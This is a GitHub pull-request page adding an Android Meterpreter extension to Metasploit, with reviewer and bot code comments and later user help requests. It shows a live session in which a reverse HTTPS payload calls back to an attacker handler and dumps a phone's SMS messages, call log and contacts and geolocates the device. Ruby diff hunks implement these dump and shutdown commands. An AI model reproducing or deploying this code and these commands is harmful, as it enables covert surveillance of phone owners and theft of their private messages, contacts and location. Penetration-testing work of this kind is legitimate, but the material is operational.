
Android meterpreter extension #3039

Closed
wants to merge 7 commits into from

5 participants

@AnwarMohamed
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_https
PAYLOAD => android/meterpreter/reverse_https
msf exploit(handler) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(handler) > set LPORT 2222
LPORT => 2222
msf exploit(handler) > exploit 

[*] Started HTTPS reverse handler on https://0.0.0.0:2222/
[*] Starting the payload handler...
[*] 10.0.0.101:43620 Request received for /TAvM_4CurVL8LMrbIqy3V...
[*] Meterpreter session 1 opened (10.0.0.1:2222 -> 10.0.0.101:43620) at 2014-02-26 03:56:50 +0200

meterpreter > sysinfo 
Computer    : localhost
OS          : Android 4.1.1 - Linux 3.0.31-302285 (armv7l)
Meterpreter : java/android
meterpreter > help

Android Commands
================

    Command          Description
    -------          -----------
    check_root       Check if device is rooted
    device_shutdown  Shutdown device
    dump_calllog     Get call log
    dump_contacts    Get contacts list
    dump_sms         Get sms messages
    geolocate        Get current lat-long using geolocation


meterpreter > check_root 
[*] Device is rooted
meterpreter > dump_calllog
[*] Fetching 164 entries
[*] Call log saved to: E:/metasploit/metasploit-framework/dump_calllog_rjOUMFHN.txt

meterpreter > dump_sms
[*] Fetching 896 sms messages
[*] Sms messages saved to: E:/metasploit/metasploit-framework/sms_dump_JQmaoINw.txt

meterpreter > dump_contacts
[*] Fetching 618 contacts into list
[*] Contacts list saved to: E:/metasploit/metasploit-framework/contacts_dump_GidUbOsl.txt

meterpreter > geolocate
[*] Current Location:

Latitude  : 31.2186009
Longitude : 29.9448264
meterpreter > exit
@AnwarMohamed

Any hopes to merge it soon, as I want to add more commands, please?

@jvennix-r7

@AnwarMohamed I'll get to this one once your reverse_http_s is landed, hopefully this week. If you want to add more commands, feel free to branch off this branch, and then push the commands up as separate PRs!

@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+class Console::CommandDispatcher::Android
+
+ Klass = Console::CommandDispatcher::Android
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

Why is this line here? I don't think Klass is ever referenced

@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+
+ )
+
+ dump_calllog_opts.parse( args ) { | opt, idx, val |
+ case opt
+ when "-h"
+ print_line( "Usage: dump_calllog [options]\n" )
+ print_line( "Get call log." )
+ print_line( dump_calllog_opts.usage )
+ return
+ when "-o"
+ path = val
+ end
+ }
+
+ log = Array.new
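Review bot: the `-o` value is assigned to `path` in the `when "-o"` branch without any validation, so a nonexistent or unwritable directory will surface later as an uncaught Errno::ENOENT/EACCES from `::File.open` instead of a clean error message. Check `::File.directory?(::File.dirname(path))` right after parsing and `print_error` and return if it fails.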
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

You can delete this line; the Array is discarded on the next line

@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+ res = client.android.device_shutdown(seconds)
+
+ if res == true
+ print_status("Device will shutdown #{seconds > 0 ?("after " + seconds + "seconds"):"now"}")
+ else
+ print_error("Device shutdown failed")
+ end
+ end
+
+ def cmd_dump_sms(*args)
+
+ path = "sms_dump_" + Rex::Text.rand_text_alpha(8) + ".txt"
+ dump_sms_opts = Rex::Parser::Arguments.new(
+ "-h" => [ false, "Help Banner" ],
+ "-o" => [ false, "Output path for sms list"]
+ )
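Review bot: `"after " + seconds + "seconds"` in the `print_status` call raises TypeError (no implicit conversion of Integer into String) whenever `seconds > 0` is true, because `seconds` must be numeric for that comparison to work; it is also missing the space before "seconds". Use interpolation instead: `print_status("Device will shutdown #{seconds > 0 ? "after #{seconds} seconds" : "now"}")`. Separately, `"-o" => [ false, "Output path for sms list"]` declares `-o` as taking no argument in Rex::Parser::Arguments, so `val` will be nil in the `-o` branch; it should be `"-o" => [ true, "Output path for sms list" ]`.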
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

the indenting is off one level here

@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+ "geolocate" => [ "geolocate"],
+ "dump_calllog" => [ "dump_calllog"],
+ "check_root" => [ "check_root"],
+ "device_shutdown" => [ "device_shutdown"]
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
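Review bot: `reqs[cmd].each` raises NoMethodError on nil if `all` ever lists a command that has no entry in `reqs`, which is easy to hit when a new command is added to one hash but not the other. Use `Array(reqs[cmd]).each` (or `reqs.fetch(cmd, [])`) so an unlisted command is kept rather than crashing the dispatcher, and rename the unused block parameter `desc` to `_desc`.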
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

This could be a little shorter with Enumerable#any?

all.delete_if do |cmd, desc|
  reqs[cmd].any? { |req| not client.commands.include?(req) }
end
@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+
+ ::File.open( path, 'wb' ) do |fd|
+
+ fd.write("\n=====================\n")
+ fd.write("[+] Sms messages dump\n")
+ fd.write("=====================\n\n")
+
+ time = Time.new
+ fd.write("Date: #{time.inspect}\n")
+ fd.write("OS: #{info['OS']}\n")
+ fd.write("Remote IP: #{client.sock.peerhost}\n")
+ fd.write("Remote Port: #{client.sock.peerport}\n\n")
+
+ smsList.each_with_index { |a, index|
+
+ fd.write("##{(index.to_i + 1).to_s()}\n")
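Review bot: the dump header (separator lines, `Date:`, `OS:`, `Remote IP:`, `Remote Port:`) is written with the same `fd.write` sequence here and in the contacts dump; factor it into a private helper that takes the title and derives the `=` separator width from `title.length` rather than hand-counting it. Also, `index` from `each_with_index` is already an Integer, so `"##{(index.to_i + 1).to_s()}\n"` can simply be `"##{index + 1}\n"`.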
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

the indent level is doubled here

@jvennix-r7 jvennix-r7 commented on an outdated diff Jun 1, 2014
.../meterpreter/ui/console/command_dispatcher/android.rb
+
+ ::File.open( path, 'wb' ) do |fd|
+
+ fd.write("\n======================\n")
+ fd.write("[+] Contacts list dump\n")
+ fd.write("======================\n\n")
+
+ time = Time.new
+ fd.write("Date: #{time.inspect}\n")
+ fd.write("OS: #{info['OS']}\n")
+ fd.write("Remote IP: #{client.sock.peerhost}\n")
+ fd.write("Remote Port: #{client.sock.peerport}\n\n")
+
+ contactList.each_with_index { |c, index|
+
+ fd.write("##{(index.to_i + 1).to_s()}\n")
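Review bot: this hunk repeats the header-writing block from the sms dump verbatim, so the helper suggested there should be used here too. In addition, both files hold personal data (messages, contacts) and are created with the process umask in the framework's working directory; pass an explicit mode, `::File.open(path, 'wb', 0600)`, so the dump is not readable by other local users by default.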
@jvennix-r7
jvennix-r7 added a note Jun 1, 2014

the indent level is doubled here as well

@AnwarMohamed

Hope that this gets merged soon

@infodox
infodox commented Jun 24, 2014

@AnwarMohamed there's a merge conflict, seemingly. You may want to reissue the pull request after getting whatever it is that's conflicting up to date :)

Looks like a fun extension though!

@ajayfuloria

hey @AnwarMohamed
I am up and running with your Android extension, but when I install the apk on the Android emulator, it says "unfortunately the com.metasploit.mainactivity got closed". Is the code on git working? Where could I have gone wrong?
thanks and please reply

help

@ajayfuloria

@AnwarMohamed, @infodox help me with executing this extension please

I cloned the https://github.com/AnwarMohamed/metasploit-framework.git
Then I merged the branch android_extension by "$git branch android_extension master/android_extension"
Then I merged the local branch and android_extension
I got conflict in jar files so I downloaded them from git directly and put them in place.

Is there a neater way to do it? I am sorry, but please help; I am new to git...

Regards,

@AnwarMohamed

please refer to #3501
